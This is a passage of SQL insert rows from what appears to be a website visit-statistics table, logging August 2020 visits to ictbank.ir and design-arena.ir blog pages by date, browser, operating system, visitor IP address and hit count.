(4211,'2020-08-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.152.132','000',0,1,0),
(4212,'2020-08-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.148.121.143','000',0,1,0),
(4213,'2020-08-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4214,'2020-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.229.90','000',0,1,0),
(4215,'2020-08-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.89.134','000',0,2,0),
(4216,'2020-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.152.237','000',0,1,0),
(4217,'2020-08-12','http://design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.81.230.12','000',0,2,0),
(4218,'2020-08-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4219,'2020-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.51.236','000',0,1,0),
(4220,'2020-08-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.195.185','000',0,1,0),
(4221,'2020-08-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','200.175.104.103','000',0,1,0),
(4222,'2020-08-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','37.194.188.26','000',0,1,0),
(4223,'2020-08-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(4224,'2020-08-12','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.90.58.33','000',0,1,0),
(4225,'2020-08-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,4,0),
(4226,'2020-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(4227,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.213.92','000',0,1,0),
(4228,'2020-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4229,'2020-08-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.231.135.220','000',0,2,0),
(4230,'2020-08-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(4231,'2020-08-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(4232,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.200.194','000',0,1,0),
(4233,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.160.6','000',0,1,0),
(4234,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4235,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.154.240','000',0,1,0),
(4236,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(4237,'2020-08-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.185.240.252','000',0,1,0),
(4238,'2020-08-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4239,'2020-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(4240,'2020-08-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','52.71.148.181','000',0,1,0),
(4241,'2020-08-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.165.200','000',0,1,0),
(4242,'2020-08-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.207.203','000',0,3,0),
(4243,'2020-08-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.150','000',0,1,0),
(4244,'2020-08-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4245,'2020-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.120.129','000',0,1,0),
(4246,'2020-08-14','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.248.247','000',0,3,0),
(4247,'2020-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.153.29','000',0,1,0),
(4248,'2020-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.8.106','000',0,1,0),
(4249,'2020-08-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4250,'2020-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.6.67','000',0,1,0),
(4251,'2020-08-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4252,'2020-08-14','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(4253,'2020-08-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4254,'2020-08-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4255,'2020-08-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.85.203.211','000',0,1,0),
(4256,'2020-08-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(4257,'2020-08-14','http://mail.design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.193.104.168','000',0,2,0),
(4258,'2020-08-15','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.193.104.168','000',0,2,0),
(4259,'2020-08-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4260,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.34.204','000',0,1,0),
(4261,'2020-08-15','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','51.255.128.218','000',0,172,0),
(4262,'2020-08-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(4263,'2020-08-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','5.200.87.176','000',0,1,0),
(4264,'2020-08-15','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.152.129','000',0,2,0),
(4265,'2020-08-15','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','46.4.33.48','000',0,1,0),
(4266,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.30.32','000',0,1,0),
(4267,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','78.85.203.211','000',0,1,0),
(4268,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.105.180','000',0,1,0),
(4269,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.156.21','000',0,1,0),
(4270,'2020-08-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','78.38.71.47','000',0,1,0),
(4271,'2020-08-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','206.189.16.203','000',0,1,0),
(4272,'2020-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4273,'2020-08-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(4274,'2020-08-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','173.252.87.11','000',0,1,0),
(4275,'2020-08-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.152.34','000',0,2,0),
(4276,'2020-08-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4277,'2020-08-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','187.189.27.21','000',0,1,0),
(4278,'2020-08-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.227.121.24','000',0,9,0),
(4279,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.118.161.203','000',0,1,0),
(4280,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.5.200','000',0,1,0),
(4281,'2020-08-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4282,'2020-08-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4283,'2020-08-16','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','178.159.92.29','000',0,1,0),
(4284,'2020-08-16','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','154.30.143.18','000',0,1,0),
(4285,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.87.146','000',0,1,0),
(4286,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.39.199','000',0,1,0),
(4287,'2020-08-16','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','77.89.228.66','000',0,1,0),
(4288,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.135.106','000',0,1,0),
(4289,'2020-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4290,'2020-08-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4291,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.74.109','000',0,3,0),
(4292,'2020-08-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.255.137.23','000',0,3,0),
(4293,'2020-08-17','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(4294,'2020-08-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(4295,'2020-08-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','62.234.140.204','000',0,3,0),
(4296,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','112.198.219.217','000',0,10,0),
(4297,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.88.22','000',0,1,0),
(4298,'2020-08-17','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(4299,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','220.200.160.116','000',0,1,0),
(4300,'2020-08-17','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.81.245.94','000',0,1,0),
(4301,'2020-08-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','27.104.141.105','000',0,3,0),
(4302,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.89.78.159','000',0,1,0),
(4303,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.159.107.222','000',0,1,0),
(4304,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.224.175','000',0,1,0),
(4305,'2020-08-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4306,'2020-08-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4307,'2020-08-17','https://www.google.com/','Chrome','OS X','10.15.6',NULL,NULL,'','178.216.60.253','000',0,1,0),
(4308,'2020-08-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,1,0),
(4309,'2020-08-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4310,'2020-08-17','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','66.42.125.232','000',0,1,0),
(4311,'2020-08-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,1,0),
(4312,'2020-08-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4313,'2020-08-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4314,'2020-08-18','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','173.201.196.146','000',0,1,0),
(4315,'2020-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.195.35','000',0,1,0),
(4316,'2020-08-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4317,'2020-08-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(4318,'2020-08-18','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.121.163.206','000',0,3,0),
(4319,'2020-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.44.100','000',0,1,0),
(4320,'2020-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.220.213','000',0,1,0),
(4321,'2020-08-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.38.224','000',0,1,0),
(4322,'2020-08-18','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','159.203.32.136','000',0,1,0),
(4323,'2020-08-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.159.88.209','000',0,1,0),
(4324,'2020-08-18','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','119.45.145.184','000',0,2,0),
(4325,'2020-08-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4326,'2020-08-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4327,'2020-08-18','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(4328,'2020-08-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4329,'2020-08-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4330,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.77.99','000',0,1,0),
(4331,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','116.252.0.244','000',0,1,0),
(4332,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','109.102.111.58','000',0,3,0),
(4333,'2020-08-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4334,'2020-08-19','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(4335,'2020-08-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4336,'2020-08-19','http://ictbank.ir/blog','Chrome','Android','9',NULL,NULL,'','5.117.228.165','000',0,3,0),
(4337,'2020-08-19','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','49.232.64.97','000',0,1,0),
(4338,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.158.60.208','000',0,1,0),
(4339,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.191.204.4','000',0,1,0),
(4340,'2020-08-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.231.161.243','000',0,1,0),
(4341,'2020-08-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,10,0),
(4342,'2020-08-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4343,'2020-08-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4344,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.117.175','000',0,1,0),
(4345,'2020-08-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.87.70','000',0,1,0),
(4346,'2020-08-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(4347,'2020-08-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,9,0),
(4348,'2020-08-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.17.3.88','000',0,1,0),
(4349,'2020-08-20','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','134.96.225.55','000',0,1,0),
(4350,'2020-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.154.71','000',0,1,0),
(4351,'2020-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.249.170.213','000',0,2,0),
(4352,'2020-08-20','http://ictbank.ir/blog','Safari','OS X','10.9.5',NULL,NULL,'','109.102.111.44','000',0,2,0),
(4353,'2020-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.215.29','000',0,1,0),
(4354,'2020-08-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(4355,'2020-08-20','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','15.236.109.244','000',0,1,0),
(4356,'2020-08-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.73.162','000',0,1,0),
(4357,'2020-08-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4358,'2020-08-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4359,'2020-08-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(4360,'2020-08-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(4361,'2020-08-20','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','58.216.12.251','000',0,1,0),
(4362,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.58.72','000',0,1,0),
(4363,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.242.234','000',0,1,0),
(4364,'2020-08-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(4365,'2020-08-21','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','109.228.48.167','000',0,1,0),
(4366,'2020-08-21','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','20.43.59.219','000',0,3,0),
(4367,'2020-08-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,4,0),
(4368,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.171.135.115','000',0,1,0),
(4369,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.232.63','000',0,1,0),
(4370,'2020-08-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.215.205.102','000',0,1,0),
(4371,'2020-08-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4372,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.207.142','000',0,1,0),
(4373,'2020-08-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4374,'2020-08-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.189.118','000',0,1,0),
(4375,'2020-08-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(4376,'2020-08-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4377,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.215.37','000',0,1,0),
(4378,'2020-08-22','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.171.188.246','000',0,1,0),
(4379,'2020-08-22','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','45.40.194.210','000',0,2,0),
(4380,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','190.228.29.221','000',0,2,0),
(4381,'2020-08-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(4382,'2020-08-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.184.40','000',0,2,0),
(4383,'2020-08-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.148.121.143','000',0,1,0),
(4384,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.234.215','000',0,1,0),
(4385,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','147.135.192.129','000',0,2,0),
(4386,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.209.166.8','000',0,1,0),
(4387,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.58.187.198','000',0,1,0),
(4388,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.199','000',0,1,0),
(4389,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.244.52.99','000',0,1,0),
(4390,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.161','000',0,1,0),
(4391,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.17','000',0,1,0),
(4392,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.175.71.154','000',0,1,0),
(4393,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.158.238.246','000',0,1,0),
(4394,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.51','000',0,1,0),
(4395,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.42','000',0,1,0),
(4396,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.0.191','000',0,1,0),
(4397,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.169.100','000',0,1,0),
(4398,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.24','000',0,1,0),
(4399,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.56.109.37','000',0,1,0),
(4400,'2020-08-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.222.66.193','000',0,18,0),
(4401,'2020-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(4402,'2020-08-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4403,'2020-08-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(4404,'2020-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.156.138','000',0,1,0),
(4405,'2020-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.209.109.84','000',0,2,0),
(4406,'2020-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.134.8','000',0,1,0),
(4407,'2020-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.121.23','000',0,1,0),
(4408,'2020-08-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.191.130','000',0,1,0),
(4409,'2020-08-23','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','178.171.73.191','000',0,1,0),
(4410,'2020-08-23','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','178.210.89.230','000',0,1,0),
(4411,'2020-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(4412,'2020-08-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(4413,'2020-08-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','165.227.214.54','000',0,1,0),
(4414,'2020-08-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,3,0),
(4415,'2020-08-23','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','45.132.82.195','000',0,1,0),
(4416,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.35.172.74','000',0,1,0),
(4417,'2020-08-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(4418,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.221.10','000',0,1,0),
(4419,'2020-08-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.21','000',0,6,0),
(4420,'2020-08-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','192.99.19.38','000',0,2,0),
(4421,'2020-08-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(4422,'2020-08-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','81.70.4.52','000',0,2,0),
(4423,'2020-08-24','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','193.111.73.253','000',0,1,0),
(4424,'2020-08-24','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.83.78','000',0,1,0),
(4425,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.221.139','000',0,1,0),
(4426,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.117.195.67','000',0,6,0),
(4427,'2020-08-24','http://82.102.9.14:80/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(4428,'2020-08-24','http://design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','93.104.214.196','000',0,1,0),
(4429,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.158.166','000',0,1,0),
(4430,'2020-08-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(4431,'2020-08-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(4432,'2020-08-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','3.131.63.234','000',0,1,0),
(4433,'2020-08-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.140','000',0,1,0),
(4434,'2020-08-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','60.166.78.141','000',0,3,0),
(4435,'2020-08-25','https://www.google.com','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,2,0),
(4436,'2020-08-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.57.124.147','000',0,1,0),
(4437,'2020-08-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','5.200.87.176','000',0,1,0),
(4438,'2020-08-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
